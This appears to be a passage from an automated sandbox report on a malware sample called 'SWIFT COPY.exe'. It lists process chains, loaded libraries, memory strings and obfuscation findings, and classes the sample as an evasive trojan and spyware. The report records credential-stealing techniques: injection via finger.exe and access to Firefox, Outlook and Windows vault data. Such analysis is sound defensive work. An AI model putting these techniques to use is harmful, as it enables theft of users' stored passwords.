                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311A3527_2_0311A352
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031203E67_2_031203E6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0306E3F07_2_0306E3F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031002747_2_03100274
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030E02C07_2_030E02C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030501007_2_03050100
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030FA1187_2_030FA118
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030E81587_2_030E8158
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031141A27_2_031141A2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031201AA7_2_031201AA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031181CC7_2_031181CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030F20007_2_030F2000
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030847507_2_03084750
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030607707_2_03060770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0305C7C07_2_0305C7C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307C6E07_2_0307C6E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030605357_2_03060535
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031205917_2_03120591
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031044207_2_03104420
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031124467_2_03112446
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0310E4F67_2_0310E4F6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311AB407_2_0311AB40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03116BD77_2_03116BD7
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0305EA807_2_0305EA80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030769627_2_03076962
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030629A07_2_030629A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0312A9A67_2_0312A9A6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030628407_2_03062840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0306A8407_2_0306A840
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030468B87_2_030468B8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0308E8F07_2_0308E8F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03102F307_2_03102F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030A2F287_2_030A2F28
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03080F307_2_03080F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D4F407_2_030D4F40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030DEFA07_2_030DEFA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03052FC87_2_03052FC8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311EE267_2_0311EE26
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03060E597_2_03060E59
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311CE937_2_0311CE93
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03072E907_2_03072E90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311EEDB7_2_0311EEDB
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0306AD007_2_0306AD00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030FCD1F7_2_030FCD1F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03078DBF7_2_03078DBF
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0305ADE07_2_0305ADE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03060C007_2_03060C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03100CB57_2_03100CB5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03050CF27_2_03050CF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311132D7_2_0311132D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0304D34C7_2_0304D34C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030A739A7_2_030A739A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030652A07_2_030652A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307B2C07_2_0307B2C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307D2F07_2_0307D2F0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031012ED7_2_031012ED
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0309516C7_2_0309516C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0304F1727_2_0304F172
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0312B16B7_2_0312B16B
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0306B1B07_2_0306B1B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030670C07_2_030670C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0310F0CC7_2_0310F0CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311F0E07_2_0311F0E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031170E97_2_031170E9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311F7B07_2_0311F7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030A56307_2_030A5630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031116CC7_2_031116CC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031175717_2_03117571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030FD5B07_2_030FD5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031295C37_2_031295C3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311F43F7_2_0311F43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030514607_2_03051460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FB767_2_0311FB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307FB807_2_0307FB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0309DBF97_2_0309DBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D5BF07_2_030D5BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03117A467_2_03117A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FA497_2_0311FA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D3A6C7_2_030D3A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030FDAAC7_2_030FDAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030A5AA07_2_030A5AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03101AA37_2_03101AA3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0310DAC67_2_0310DAC6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030F59107_2_030F5910
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030699507_2_03069950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307B9507_2_0307B950
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030CD8007_2_030CD800
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030638E07_2_030638E0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FF097_2_0311FF09
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03061F927_2_03061F92
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FFB17_2_0311FFB1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03023FD27_2_03023FD2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03023FD57_2_03023FD5
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03069EB07_2_03069EB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03063D407_2_03063D40
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03111D5A7_2_03111D5A
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03117D737_2_03117D73
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307FDC07_2_0307FDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D9C327_2_030D9C32
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FCF27_2_0311FCF2
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02881ED07_2_02881ED0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287CFE07_2_0287CFE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287AFE87_2_0287AFE8
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287AFF07_2_0287AFF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287CDC07_2_0287CDC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287B1367_2_0287B136
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0287B1407_2_0287B140
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_028837707_2_02883770
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_028855607_2_02885560
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0289BC207_2_0289BC20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7E3987_2_02F7E398
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7E4B37_2_02F7E4B3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7CBAA7_2_02F7CBAA
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7D8E37_2_02F7D8E3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7E84C7_2_02F7E84C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02F7D9187_2_02F7D918
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 030DF290 appears 103 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 03095130 appears 58 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 030A7E54 appears 107 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 030CEA12 appears 86 times
                Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 0304B970 appears 262 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 0132B970 appears 262 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 013AEA12 appears 86 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 01387E54 appears 107 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 013BF290 appears 103 times
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: String function: 01375130 appears 58 times
                Source: SWIFT COPY.exe, 00000000.00000002.1883711010.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000000.00000002.1891135777.0000000007780000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000000.00000000.1715349562.0000000000752000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameZHWfc.exe4 vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000000.00000002.1893555495.000000000A090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs SWIFT COPY.exe
                Source: SWIFT COPY.exe, 00000003.00000002.2224917606.000000000142D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SWIFT COPY.exe
                Source: SWIFT COPY.exeBinary or memory string: OriginalFilenameZHWfc.exe4 vs SWIFT COPY.exe
                Source: SWIFT COPY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SWIFT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, CkhZDfJRAqSUsrAlWc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@4/3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SWIFT COPY.exe.logJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\finger.exeFile created: C:\Users\user\AppData\Local\Temp\40F193-3PQJump to behavior
                Source: SWIFT COPY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: SWIFT COPY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: finger.exe, 00000007.00000002.3578499987.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2406743191.0000000002A86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SWIFT COPY.exeVirustotal: Detection: 34%
                Source: SWIFT COPY.exeReversingLabs: Detection: 63%
                Source: unknownProcess created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SWIFT COPY.exeProcess created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"Jump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SWIFT COPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: SWIFT COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SWIFT COPY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XwGiOcrCkQ.exe, 00000006.00000002.3579093202.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293359567.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SWIFT COPY.exe, SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 0.2.SWIFT COPY.exe.a090000.4.raw.unpack, dfYpPxNTwkBs8S5PKa.cs.Net Code: nAh8jNlwVj System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SWIFT COPY.exe.43c5b98.1.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SWIFT COPY.exe.43a5b78.2.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_04FB1EBF pushad ; retf 0_2_04FB1EC6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43361 push 69C84589h; ret 0_2_09D43371
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43B6F push 69C84589h; ret 0_2_09D43B74
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D4333C push 69C84589h; ret 0_2_09D43343
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43AB5 push 69C84589h; ret 0_2_09D43ABA
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 0_2_09D43D6E push 69D04589h; ret 0_2_09D43D75
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00416163 pusha ; iretd 3_2_004160B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00403110 push eax; ret 3_2_00403112
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040D1E1 push edx; retf 3_2_0040D1EB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0041427A push esp; ret 3_2_00414347
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00414222 push esp; ret 3_2_00414347
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0040D2E0 push edi; retf 3_2_0040D2E4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0041435B push esp; ret 3_2_00414347
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00401D02 push ss; iretd 3_2_00401D04
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00418D36 push ds; iretd 3_2_00418D3C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00414587 push edi; ret 3_2_0041459C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00414593 push edi; ret 3_2_0041459C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00416626 push eax; ret 3_2_004166A4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00415ED3 pusha ; iretd 3_2_004160B8
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0041177F pushfd ; ret 3_2_00411786
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_00423783 push edi; iretd 3_2_0042378E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0130225F pushad ; ret 3_2_013027F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013027FA pushad ; ret 3_2_013027F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013309AD push ecx; mov dword ptr [esp], ecx3_2_013309B6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0130283D push eax; iretd 3_2_01302858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0302225F pushad ; ret 7_2_030227F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030227FA pushad ; ret 7_2_030227F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030509AD push ecx; mov dword ptr [esp], ecx7_2_030509B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0302283D push eax; iretd 7_2_03022858
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03021366 push eax; iretd 7_2_03021369
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0289066A push edi; iretd 7_2_0289067B
                Source: SWIFT COPY.exeStatic PE information: section name: .text entropy: 7.67844699512359
